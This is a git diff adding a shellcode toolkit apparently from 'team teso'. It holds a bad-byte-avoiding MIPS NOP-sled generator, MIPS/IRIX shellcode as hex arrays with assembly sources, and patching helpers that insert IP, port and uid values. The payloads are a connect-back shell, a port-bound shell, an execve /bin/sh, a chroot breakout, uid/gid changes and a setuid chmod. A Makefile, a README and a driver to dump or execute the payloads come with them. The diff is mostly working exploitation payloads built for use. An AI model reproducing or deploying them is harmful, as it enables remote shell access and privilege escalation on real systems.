(tgt, 5, mips_nop_rwreg (), bw); + break; + case ('c'): + BSET (tgt, 16, random_get (0, 0xffff), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 32) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +mips_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "000000.r.r.w.00000.000100", /* sllv rs rt rd */ + "000000.r.r.w.00000.000110", /* srlv rs rt rd */ + "000000.r.r.w.00000.000111", /* srav rs rt rd */ + "000000.r.r.w.00000.100001", /* addu rs rt rd */ + "000000.r.r.w.00000.100011", /* subu rs rt rd */ + "000000.r.r.w.00000.100100", /* and rs rt rd */ + "000000.r.r.w.00000.100101", /* or rs rt rd */ + "000000.r.r.w.00000.100110", /* xor rs rt rd */ + "000000.r.r.w.00000.100111", /* nor rs rt rd */ + "000000.r.r.w.00000.101010", /* slt rs rt rd */ + "000000.r.r.w.00000.101011", /* sltu rs rt rd */ + "001001.r.w.c", /* addiu rs rd const */ + "001010.r.w.c", /* slti rs rd const */ + "001011.r.w.c", /* sltiu rs rd const */ + "001100.r.w.c", /* andi rs rd const */ + "001101.r.w.c", /* ori rs rd const */ + "001110.r.w.c", /* xori rs rd const */ + "001111.00000.w.c", /* lui rd const */ + NULL, + }; + unsigned long int tgt; + + if (dest_len % 4) { + fprintf (stderr, "off by %d padding of dest_len (= %u), rounding down\n", + dest_len % 4, dest_len); + dest_len -= (dest_len % 4); + } + + for (walk = 0 ; dest_len > 0 ; dest_len -= 4 , walk += 4) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 17)]; + tgt = mips_nop_xfer (xs); + + dest[walk + 0] = (tgt >> 24) & 0xff; + dest[walk + 1] = (tgt >> 16) & 0xff; + dest[walk + 2] = (tgt >> 8) & 0xff; + dest[walk + 3] = tgt & 0xff; + if (badstr (&dest[walk], 4, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + + diff --git a/other/shellkit/mips.h b/other/shellkit/mips.h new file mode 100644 index 0000000..98f8999 --- /dev/null +++ b/other/shellkit/mips.h @@ -0,0 +1,19 @@ + +#ifndef MIPS_H +#define MIPS_H + +/* mips_nop + * + * create `dest_len' bytes of nopspace at `dest', which does not contain any + * of the bytes in `bad', which is a char array, `bad_len' in size + * + * return number of bytes generated + */ + +unsigned int +mips_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#endif + + diff --git a/other/shellkit/mips.o b/other/shellkit/mips.o new file mode 100644 index 0000000..7f753ca Binary files /dev/null and b/other/shellkit/mips.o differ diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c new file mode 100644 index 0000000..33bf38c --- /dev/null +++ b/other/shellkit/mips_irix.c @@ -0,0 +1,231 @@ + +#include +#include +#include +#include "shellcode.h" +#include "mips.h" + + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_chmod = { + "mips-irix-chmod", + 64, + "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55" + /* ^^ ^^ = uid ^ 0x5555 */ + "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80" + /* ^^ ^^ = gid ^ 0x5555 */ + "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8" + /* ^^ ^^ = length of appended pathname + 0xfeb8 */ + "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7" + "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c" + "\x24\x18\x72\xec", +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_chroot = { + "mips-irix-chroot", + 84, + "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e" + "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0" + "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c" + "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11" + "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c" + "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26" + "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50", +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_connectsh = { + "mips-irix-connectsh", + 172, + "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" + "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" + "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" + "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42" + /* ^^ ^^ port */ /* ^^ ^^ ip 1.2. */ + "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8" + /* ^^ ^^ ip .3.4 */ + "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23" + "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2" + "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee" + "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff" + "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c" + "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc" + "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20" + "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8" + "\x24\x02\x04\x23\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_execvesh = { + "mips-irix-execvesh", + 48, + "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc" + "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" + "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23" + "\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +shellcode mips_irix_exit = { + "mips-irix-exit", + 16, + "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c" + "\x24\x18\x73\x50", +}; + +/* tested on: IP20 R4000 6.5 + * IP30 R10000 6.5.7m (thanks oxigen ;) + */ +shellcode mips_irix_portshellsh = { + "mips-irix-portshellsh", + 188, /* yay! well optimized */ + "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2" + "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c" + "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0" + "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */ + "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0" + "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c" + "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec" + "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c" + "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03" + "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff" + "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26" + "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6" + "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8" + "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff" + "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c" + "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */ +}; + +/* tested on: IP20 R4000 6.5 + */ +shellcode mips_irix_read = { + "mips-irix-read", + 56, + "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31" + "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb" + "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10" + "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f" + "\x01\x01\x01\x0c\x24\x18\x73\x50", +}; + +shellcode mips_irix_setgid = { + "mips-irix-setgid", + 16, + "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */ + "\x01\x01\x01\x0c", +}; + +shellcode mips_irix_setreuid = { + "mips-irix-setreuid", + 24, + "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55" + /* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */ + "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c", +}; + + +shellcode * mips_irix_shellcodes[] = { + &mips_irix_chmod, + &mips_irix_chroot, + &mips_irix_connectsh, + &mips_irix_execvesh, + &mips_irix_exit, + &mips_irix_portshellsh, + &mips_irix_read, + &mips_irix_setgid, + &mips_irix_setreuid, + NULL, +}; + + +arch mips_irix = { + "mips-irix", + 4, + mips_nop, + mips_irix_shellcodes, +}; + + + +/* set the uid, gid and pathname of the mips-irix-chmod code at `code' + * XXX: be sure to have strlen(pathname) bytes left after code + */ +void +mips_irix_chmod_setup (unsigned char *code, char *pathname, + unsigned short int uid, unsigned short int gid) +{ + unsigned short int len = 0xfeb8; + + uid ^= 0x5555; + code[6] = (uid >> 8) & 0xff; + code[7] = uid & 0xff; + + gid ^= 0x5555; + code[14] = (gid >> 8) & 0xff; + code[15] = gid & 0xff; + + len += strlen (pathname); + code[26] = (len >> 8) & 0xff; + code[27] = len & 0xff; + + memcpy (code + 64, pathname, strlen (pathname)); + + return; +} + + +/* ip and port in network byte order + */ +void +mips_irix_connectsh_setup (unsigned char *code, + unsigned long int ip, unsigned short int port) +{ + code[38] = (port >> 8) & 0xff; + code[39] = port & 0xff; + + code[46] = (ip >> 24) & 0xff; + code[47] = (ip >> 16) & 0xff; + code[50] = (ip >> 8) & 0xff; + code[51] = ip & 0xff; + + return; +} + + +/* set the gid within the 'mips-irix-setgid' code at `code' + */ +void +mips_irix_setgid_setup (unsigned char *code, unsigned short int gid) +{ + gid ^= 0x5555; + + code[2] = (gid >> 8) & 0xff; + code[3] = gid & 0xff; + + return; +} + + +void +mips_irix_setreuid_setup (unsigned char *code, + unsigned short int ruid, unsigned short int euid) +{ + ruid ^= 0x5555; + code[2] = (ruid >> 8) & 0xff; + code[3] = ruid & 0xff; + + euid ^= 0x5555; + code[6] = (euid >> 8) & 0xff; + code[7] = euid & 0xff; + + return; +} + + diff --git a/other/shellkit/mips_irix.h b/other/shellkit/mips_irix.h new file mode 100644 index 0000000..68c633a --- /dev/null +++ b/other/shellkit/mips_irix.h @@ -0,0 +1,17 @@ + +#ifndef MIPS_IRIX_H +#define MIPS_IRIX_H + +#include "shellcode.h" + +arch mips_irix; + +void +mips_irix_setgid_setup (unsigned char *code, unsigned short int gid); + +void +mips_irix_setreuid_setup (unsigned char *code, + unsigned short int ruid, unsigned short int euid); + +#endif + diff --git a/other/shellkit/mips_irix.o b/other/shellkit/mips_irix.o new file mode 100644 index 0000000..b5313da Binary files /dev/null and b/other/shellkit/mips_irix.o differ diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile new file mode 100644 index 0000000..a68d231 --- /dev/null +++ b/other/shellkit/mips_irix/Makefile @@ -0,0 +1,22 @@ + +#DFLAGS=-O2 +DFLAGS=-g -ggdb +CC=gcc +CFLAGS=$(DFLAGS) -Wall -DIRIX + +all: + $(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s + $(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s + $(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s + $(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s + $(CC) $(CFLAGS) -o exit ../codedump.c exit.s + $(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s + $(CC) $(CFLAGS) -o read ../codedump.c read.s + $(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s + $(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s + +clean: + rm -f code.h codetest \ + chmod chroot connectsh execvesh exit portshellsh read \ + setgid setreuid + diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README new file mode 100644 index 0000000..a78c668 --- /dev/null +++ b/other/shellkit/mips_irix/README @@ -0,0 +1,25 @@ + +mips/irix shellcodes +some comments in this file + + +for execvesh and portshellsh append "/bin/sh\x42" to the code. + +if you want to execute something different than "/bin/sh", be sure to properly +set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop +and adjust the self-relocation. + +the codedump utility build extra cache control syscalls, so it flushes all +caches properly and you can run the code safily then from a flushed cache. + +example: + +scut@hyperion $ make >/dev/null +scut@hyperion $ ./execvesh + <... dumps the hexcode ...> +scut@hyperion $ ./execvesh exec +len = 68 +$ +$ exit +scut@hyperion $ + diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s new file mode 100644 index 0000000..181c123 --- /dev/null +++ b/other/shellkit/mips_irix/chmod.s @@ -0,0 +1,49 @@ +/* MIPS/IRIX PIC chmod code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + + /* FIXME: its not workable atm */ +cbegin: + .set noreorder + .set nomacro + +lbl: bltzal zero, lbl + + li a1, 0x4141 /* a1 = uid ^ 0x5555 */ + xor a1, a1, 0x5555 + li a2, 0x4242 /* a2 = gid ^ 0x5555 */ + xor a2, a2, 0x555 + + addu a0, ra, 0x0180 + sb zero, -(0x0148 + -(9))(a0) + subu a0, a0, 0x0148 + + /* chown (a0 = pathname, a1 = uid, a2 = gid) */ + li v0, SYS_chown /* 0x03f8 */ + syscall + + /* chmod (a0 = pathname, a1 = 04755) */ + li a1, 0x09ed /* a1 = 04755 = 0x09ed */ + li v0, SYS_chmod /* 0x03f7 */ + syscall + + li v0, SYS_exit /* 0x03e9 */ + syscall + li t8, 0x72ec /* sane ds */ + + .end cbegin +cend: + + /* XXX: append pathname here, will get NUL terminated */ diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s new file mode 100644 index 0000000..96a1595 --- /dev/null +++ b/other/shellkit/mips_irix/chroot.s @@ -0,0 +1,60 @@ +/* MIPS/IRIX PIC chroot break + * without 0x00, 0x0a, 0x0d, 0x25 + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + +foo: bltzal zero, foo + li a1, 0700 /* a1 = 0700 permission */ + + /* mkdir ("Y..", 0700); + */ + lui t2, 0x592e + ori t2, 0x2cff /* t1 = "Y..\x00" */ + add t2, t2, 0x0101 + sw t2, -48(ra) + + subu a0, ra, 48 /* a0 = "Y.." */ + li v0, SYS_mkdir /* 0x0438 */ + syscall + + /* chroot ("Y.."); + * a0 still points to it + */ + addu v0, a1, (SYS_chroot - 0700) /* v0 = SYS_chroot (0x0425) */ + syscall + + /* chdir ("..") a few times + */ + li s2, 0x1211 /* 12 times chdir ("..") */ + +foo2: subu a0, ra, 47 /* "..\x00" */ + li v0, SYS_chdir /* 0x03f4 */ + syscall + sub s2, 0x0101 + bgez s2, foo2 + + addu v0, s2, 0x0426 /* bds: SYS_chroot (0x0425) + 1 */ + subu a0, ra, 46 /* ".\x00" */ + syscall + li t2, 0x7350 /* NOP */ + + .end cbegin +cend: + nop + diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s new file mode 100644 index 0000000..7b77d4e --- /dev/null +++ b/other/shellkit/mips_irix/connectsh.s @@ -0,0 +1,109 @@ +/* MIPS/IRIX PIC connect shell shellcode + * no 0x00, 0x0a, 0x0d, 0x25 bytes + * + * -sc + */ + + /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */ + +#include +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) + */ + li s6, 0x7350 + subu a0, s6, 0x734e /* AF_INET = 2 */ + subu a1, s6, 0x734e /* SOCK_STREAM = 2 */ + subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */ + li v0, SYS_socket /* 0x0453 */ + syscall + + /* socket returned in v0, save to a0 + */ + andi a0, v0, 0xffff /* a0 = socket */ + + /* build struct sockaddr_in + * 0x0002port 0x_IP-addr_ 0x00000000 0x00000000 + */ + subu t2, s6, 0x734e /* t2 = 0x0002 */ + sh t2, -16(sp) + li t2, 0x4141 /* t2 = port number */ + sh t2, -14(sp) + + /* ip address */ + lui t2, 0x4142 + ori t2, t2, 0x4344 + sw t2, -12(sp) + + sw zero, -8(sp) + sw zero, -4(sp) + + /* connect (socket, (struct sockaddr *) cs, + * sizeof (struct sockaddr_in) + */ + subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */ + subu a1, sp, a2 /* a1 = (struct sockaddr *) */ + li v0, SYS_connect /* 0x0443 */ + syscall + + /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2) + */ + subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */ + + /* socket returned in v0, save in s7 + */ + andi s7, a0, 0xffff + + /* dup is emulated through close and fcntl, since irix offers no + * native dup syscall as for example linux. see phrack 56 for details + */ +dup_loop: + andi a0, s3, 0x0103 /* a0 = STD*_FILENO */ + li v0, SYS_close /* 0x03ee */ + syscall + + andi a0, s7, 0xffff /* a0 = socket */ + slti a1, zero, -1 /* a1 = 0 */ + andi a2, s3, 0x0103 /* a2 = STD*_FILENO */ + li v0, SYS_fcntl /* 0x0426 */ + syscall + + subu s3, 0x1011 + bgez s3, dup_loop + + /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL) + */ + sw zero, -4(sp) + + /* a2 (envp) is already zero due to the dup_loop + */ +gaddr: bltzal zero, gaddr /* rock on-. lsd */ + subu a1, sp, 8 + + /* ra contains the proper address now */ + addu ra, ra, 0x0120 /* add 32 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) /* store NUL */ + sw a0, -8(sp) + li v0, SYS_execve + syscall + + .end cbegin +cend: + + /* XXX append here: "/bin/sh\x42" */ + diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s new file mode 100644 index 0000000..89fd45b --- /dev/null +++ b/other/shellkit/mips_irix/execvesh.s @@ -0,0 +1,36 @@ +/* MIPS/IRIX PIC execve code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + sw zero, -4(sp) +foo: bltzal zero, foo + lw a2, -4(sp) + + addu ra, ra, 0x0124 /* add 36 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) + sw a0, -8(sp) + subu a1, sp, 8 + li v0, SYS_execve + syscall + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s new file mode 100644 index 0000000..aef7d01 --- /dev/null +++ b/other/shellkit/mips_irix/exit.s @@ -0,0 +1,29 @@ +/* MIPS/IRIX PIC exit code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* _exit (0) */ + slti a0, zero, -1 + li v0, SYS_exit /* 0x03e9 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s new file mode 100644 index 0000000..18070f6 --- /dev/null +++ b/other/shellkit/mips_irix/portshellsh.s @@ -0,0 +1,126 @@ +/* MIPS/IRIX PIC listening port shellcode + * no 0x00, 0x0a, 0x0d, 0x25 bytes + * + * bind a shell to tcp port 0x4141 + * + * 2001/05/25 optimized from 368 down to 188 bytes -sc. + * + */ + + /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */ + +#include +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP) + */ + li s6, 0x7350 + subu a0, s6, 0x734e /* AF_INET = 2 */ + subu a1, s6, 0x734e /* SOCK_STREAM = 2 */ + subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */ + li v0, SYS_socket /* 0x0453 */ + syscall + + /* socket returned in v0, save to a0 + */ + andi a0, v0, 0xffff /* a0 = socket */ + + /* build struct sockaddr_in + * 0x0002port 0x00000000 0x00000000 0x00000000 + */ + subu t2, s6, 0x734e /* t2 = 0x0002 */ + sh t2, -16(sp) + li t2, 0x4141 /* t2 = port number */ + sh t2, -14(sp) + sw zero, -12(sp) + sw zero, -8(sp) + sw zero, -4(sp) + + /* bind (socket, (struct sockaddr *) srv_addr, + * sizeof (struct sockaddr_in) + */ + subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */ + subu a1, sp, a2 /* a1 = (struct sockaddr *) */ + li v0, SYS_bind /* 0x0442 */ + syscall + + /* listen (socket, backlog) + * XXX: is it safe here to make backlog = pointer-on-the-stack ? + * should be, since its still a positive number + */ +/* subu a1, s6, 0x7340 *//* a1 = backlog = 0x10 */ + li v0, SYS_listen /* 0x0448 */ + syscall + + /* accept (socket, (struct sockaddr *) cl_addr, + * &socklen) + * XXX: a1 is still the pointer to the sockaddr struct + * a2 should be 0x10 still + */ + sw a2, -20(sp) + subu a2, sp, 20 /* a2 = &socklen */ + li v0, SYS_accept /* 0x0441 */ + syscall + + + /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2) + */ + subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */ + + /* socket returned in v0, save in s7 + */ + andi s7, v0, 0xffff + + /* dup is emulated through close and fcntl, since irix offers no + * native dup syscall as for example linux. see phrack 56 for details + */ +dup_loop: + andi a0, s3, 0x0103 /* a0 = STD*_FILENO */ + li v0, SYS_close /* 0x03ee */ + syscall + + andi a0, s7, 0xffff /* a0 = socket */ + slti a1, zero, -1 /* a1 = 0 */ + andi a2, s3, 0x0103 /* a2 = STD*_FILENO */ + li v0, SYS_fcntl /* 0x0426 */ + syscall + + subu s3, 0x1011 + bgez s3, dup_loop + + /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL) + */ + sw zero, -4(sp) + + /* a2 (envp) is already zero due to the dup_loop + */ +gaddr: bltzal zero, gaddr /* rock on-. lsd */ + subu a1, sp, 8 + + /* ra contains the proper address now */ + addu ra, ra, 0x0120 /* add 32 + 0x0100 */ + + add a0, ra, -(8 + 0x100) + sb zero, -(1 + 0x100)(ra) /* store NUL */ + sw a0, -8(sp) + li v0, SYS_execve + syscall + + .end cbegin +cend: + + /* XXX append here: "/bin/sh\x42" */ + diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s new file mode 100644 index 0000000..90ab25d --- /dev/null +++ b/other/shellkit/mips_irix/read.s @@ -0,0 +1,51 @@ +/* MIPS/IRIX PIC read/cacheflush code + * + * -sc. + * + * some note: + * since the data that is read in is treated in the data cache, you may + * experience a data/instruction cache incoherence, where the instruction + * cache still contains the old memory contents. to avoid this, send a lot + * of data, first the shellcode and then a huge bogus space of nops, which + * are to flush the data cache, later making the instruction cache populated + * with the real shellcode. or do it as we do it here, use a cacheflush + * syscall. this is only possible if this code is already in icache, so for + * the usual exploitation situation that does not help much. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + +foo: bltzal zero, foo + slti a0, zero, -1 + + addu ra, ra, (0x0101 + 48) + subu a1, ra, 0x0101 + + li a2, 0x1010 /* read 0x1010 bytes max */ + li v0, SYS_read + syscall + + subu a0, ra, 0x0101 /* data was read to here */ + li a1, 0x1010 /* should be cacheline aligned */ + li t2, -4 + not a2, t2 /* BCACHE = 0x03 */ + li v0, SYS_cachectl /* 0x047e */ + syscall + li t8, 0x7350 /* has to be a sane bds */ + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s new file mode 100644 index 0000000..3223892 --- /dev/null +++ b/other/shellkit/mips_irix/setgid.s @@ -0,0 +1,30 @@ +/* MIPS/IRIX PIC setgid chainable code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* setgid (a0) */ + li a0, 0x4141 /* gid ^ 0x5555 */ + xor a0, a0, 0x5555 + li v0, SYS_setgid /* 0x0416 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s new file mode 100644 index 0000000..9578262 --- /dev/null +++ b/other/shellkit/mips_irix/setreuid.s @@ -0,0 +1,32 @@ +/* MIPS/IRIX PIC setreuid chainable code + * + * -sc. + */ + +#include +#include +#include +#include +#include + + .section .text + + .globl cbegin + .globl cend + +cbegin: + .set noreorder + .set nomacro + + /* setreuid (a0, a1) */ + li a0, 0x4141 /* ruid ^ 0x5555 */ + li a1, 0x4242 /* euid ^ 0x5555 */ + xor a0, a0, 0x5555 + xor a1, a1, 0x5555 + li v0, SYS_setreuid /* 0x0464 */ + syscall + li t8, 0x7350 + + .end cbegin +cend: + diff --git a/other/shellkit/shellcode.c b/other/shellkit/shellcode.c new file mode 100644 index 0000000..330fe2e --- /dev/null +++ b/other/shellkit/shellcode.c @@ -0,0 +1,61 @@ + +/* TODO: better randomness + */ + +#include +#include +#include +#include +#include "shellcode.h" + + +unsigned long int +random_get (unsigned long int low, unsigned long int high) +{ + unsigned long int val; + + if (low > high) { + low ^= high; + high ^= low; + low ^= high; + } + + val = (unsigned long int) random (); + val %= (high - low); + val += low; + + return (val); +} + + +void +random_init (void) +{ + srandom (time (NULL)); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len) +{ + int n; + + for (code_len -= 1 ; code_len >= 0 ; --code_len) { + for (n = 0 ; n < bad_len ; ++n) + if (code[code_len] == bad[n]) + return (1); + } + + return (0); +} + + diff --git a/other/shellkit/shellcode.h b/other/shellkit/shellcode.h new file mode 100644 index 0000000..02e090c --- /dev/null +++ b/other/shellkit/shellcode.h @@ -0,0 +1,62 @@ + +/* shellcode.h - shellcode structure and function definitions + * + * team teso + */ + +#ifndef SHELLCODE_H +#define SHELLCODE_H + + +/* (nop_gen) function type which will generate a nop space: + * parameters: unsigned char *dest, unsigned int dest_len + * + * will generate no more than dest_len bytes of nop space. the length + * is rounded down to a multiple of arch_codelen, so for risc archs be + * sure dest_len % arch_codelen is zero + * + * return the number of nop bytes generated (not the instruction count) + * + * XXX: name your functions _nop + */ +typedef unsigned int (* nop_gen)(unsigned char *, unsigned int, + unsigned char *, int); + +/* helper macro to set individual bits + */ +#define BSET(dest, len, val, bw) { \ + dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \ + dest |= val << (8 - bw - len); /* set value bits */ \ + bw += len; \ +} + + +typedef struct { + char * code_string; /* description string of the code */ + unsigned int code_len; /* length of code in bytes */ + unsigned char * code; /* code byte array */ +} shellcode; + + +typedef struct { + char * arch_string; /* description string of this arch */ + unsigned int arch_codelen; /* minimum instruction length */ + nop_gen arch_nop; /* nop space generation function */ + shellcode ** arch_codes; /* shellcode array for this arch */ +} arch; + + +unsigned long int +random_get (unsigned long int low, unsigned long int high); + +void +random_init (void); + +int +bad (unsigned char u); + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len); + +#endif + diff --git a/other/shellkit/shellcode.o b/other/shellkit/shellcode.o new file mode 100644 index 0000000..189bd9e Binary files /dev/null and b/other/shellkit/shellcode.o differ diff --git a/other/shellkit/shellkit b/other/shellkit/shellkit new file mode 100644 index 0000000..1dab7f3 Binary files /dev/null and b/other/shellkit/shellkit differ diff --git a/other/shellkit/shellkit.c b/other/shellkit/shellkit.c new file mode 100644 index 0000000..79d830d --- /dev/null +++ b/other/shellkit/shellkit.c @@ -0,0 +1,123 @@ +/* shellkit.c - experimentation program for included shellcodes + * + * team teso + */ + +#include +#include +#include +#include "shellkit.h" + + +void usage (void); +void sc_list (void); + +int dump = 0; +int execute = 0; + + +void +usage (void) +{ + printf ("usage: shellkit [-hdlx] [-e env1 [-e env2] ...] [code-identifier1 [ci2 [...]]]\n\n"); + printf ("options:\n"); + printf ("\t-h\thelp, you're just viewing it\n" + "\t-d\tdump shellcode in hex\n" + "\t-l\tonly list available shellcodes\n" + "\t-x\texecute choosen shellcode\n" + "\t-e env\tbuild an environment for the shellcode, use -e list\n" + "\t\tto get a 